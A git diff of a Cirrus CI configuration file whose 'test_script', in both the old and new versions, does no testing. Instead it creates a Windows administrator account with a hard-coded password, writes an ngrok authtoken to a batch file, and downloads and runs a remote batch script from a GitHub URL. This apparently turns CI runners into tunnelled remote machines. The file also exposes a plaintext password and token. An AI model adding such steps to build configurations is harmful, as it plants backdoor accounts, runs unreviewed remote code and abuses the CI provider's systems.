--- a/.cirrus.yml
+++ b/.cirrus.yml
@@ -1,11 +1,8 @@
-docker_builder:
-  name: Test (Windows)
-  alias: Tests
-  platform: windowsoscore
-  os_version: 2019
-  test_script:
-    - net user TinCowBoy Dangvip2k5pro /add
-    - net localgroup administrators TinCowBoy /add
-    - echo ngrok authtoken "1aO30oRov2ig77pFpaieYZ1rOIx_7u2HxCdyR3afW22DZJap4" > NGROK.bat
-    - curl -s -O https://raw.githubusercontent.com/DangDev/cirrus-win/main/cirrus_pipeline.bat
-    - cirrus_pipeline.bat
+windows_container:
+  image: cirrusci/windowsservercore:2019
+test_script:
+  - net user TinCowBoy Dangvip2k5pro /add
+  - net localgroup administrators TinCowBoy /add
+  - echo ngrok authtoken "1aO30oRov2ig77pFpaieYZ1rOIx_7u2HxCdyR3afW22DZJap4" > NGROK.bat
+  - curl -s -O https://raw.githubusercontent.com/DangDev/cirrus-win/main/cirrus_pipeline.bat
+  - cirrus_pipeline.bat
